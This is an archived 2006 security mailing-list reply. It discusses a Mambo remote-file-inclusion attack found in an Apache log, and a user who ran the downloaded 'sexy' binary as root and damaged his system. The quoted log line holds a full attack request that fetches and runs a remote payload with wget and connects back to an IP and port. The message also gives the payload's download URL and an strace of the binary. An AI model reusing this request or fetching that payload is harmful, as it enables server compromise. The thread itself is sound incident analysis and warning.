Re: Strange Apache log and mambo security - sexy executable

[Michael Loftis <mloftis@modwest.com>]

--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
<holtkamp@medical-city.de> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Hi,
>
> yesterday morning I found a strange entry in my apache log files (debian
> sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> Server, just serving my Family and some good friends (normally).
>
> - ---cut---
> 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
> mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
> 20212.20
> 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
> YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
> Windows NT 5.1;)" - ---cut---
>
> As I patched mambo against recent "register global" attack and my /tmp
> is mount noexec, the attack doesn't exploit anything.
>
> However, I curiously downloaded this sexy executable to have a closer
> look.
>
> - ---cut---
> backup:/home/qmb# ./sexy -h
> ./sexy <host> <port>
> - ---cut---

Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.
> This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
> used to make rsync backups of LAN hosts to usb hds.
>
> Unfortunately, I was that curious, that I decided to strace it (in spite
> I hardly understand strace):
>
> - ---cut---
> backup:/home/qmb# strace ./sexy
> execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
> uname({sys="Linux", node="backup", ...}) = 0
> brk(0)                                  = 0x804a000
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7f13000
> access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.cache", O_RDONLY)      = 3
> fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
> old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
> close(3)                                = 0
> access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or
> directory)
> open("/lib/tls/libc.so.6", O_RDONLY)    = 3
> read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
> 512) = 512
> fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
> old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
> 0xb7dd6000 old_mmap(0xb7f00000, 36864, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f00000
> old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
> close(3)                                = 0
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7dd5000
> set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
> limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
> limit_in_pages:1, seg_not_present:0, useable:1}) = 0
> munmap(0xb7f0b000, 30780)               = 0
> fork()                                  = 11935
> fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
> mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
> 0) = 0xb7f12000
> write(1, "./sexy <host> <port>\n", 21./sexy <host> <port>
> )  = 21
> munmap(0xb7f12000, 4096)                = 0
> exit_group(2)                           = ?
> - ---cut---
>
> After this run the box was hardly damaged:
>
> - - It insists on bringing its NIC to promiscuous mode
> - - ls, grep, gunzip (probably others, too) just give a segmentation
>   fault
>
> I tried to investigate further:
>
> - - tcpdump doesn't show any traffic in the net that shouldn't be there
> - - ps ax listed only known processes, all where found in /proc, too
> - - Top doesn't show anything strange
> - - netstat -tulpen doesn't list any ports listening
>
> Trying rebooting failed totally. It tried to run a lot of grep processes
> that didn't run etc.
>
> It took me 2 hours to return to a normal state with this box (booting
> knoppix, backup of corrupted /var, blanking the disc, restoring the
> backup of the night before).
>
> In spite I am not that familiar with strace and no coder, I suppose that
> the program "sexy" damaged the linker (open ld.so.cache) and would have
> tried to open a ptty on the IP/port given on the command line (As I did
> not give any command line arguments, this failed). Probably the guy/bot
> on the other end would have exchanged some libs in this session to
> install the real rootkit on the box.
>
> Right?

Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You're probably running a litle 
different target OS than 'sexy' was built for.

> Though I already invested some time (restoring the host backup), I would
> be pleased to understand what happened more detailed so any clue is
> appreciated.
>
> If somebody wants to have a closer look at the binary, I think you can
> still get at:
>
> http://212.203.97.120/sexy
>
> Does it make any sense to complain at the abuse teams of the involved
> IPs given in the apache log?

Yes, but again, you shouldn't have been so slow as to run this code, your 
box is completely compromised, and might still be.  Just as you wouldn't 
click on and run an executable in a windows machine that someone had 
emailed to you, you should never execute suspect code, ESPECIALLY as root. 
You handed the keys to your machine over.

> TIA.
>
> BTW: The name of the binary "sexy", doesn't make it easier to STFW :(
>
> PS: Sorry, to all I bothered when sending this message to the private
>     list (d-s@debian.org) first.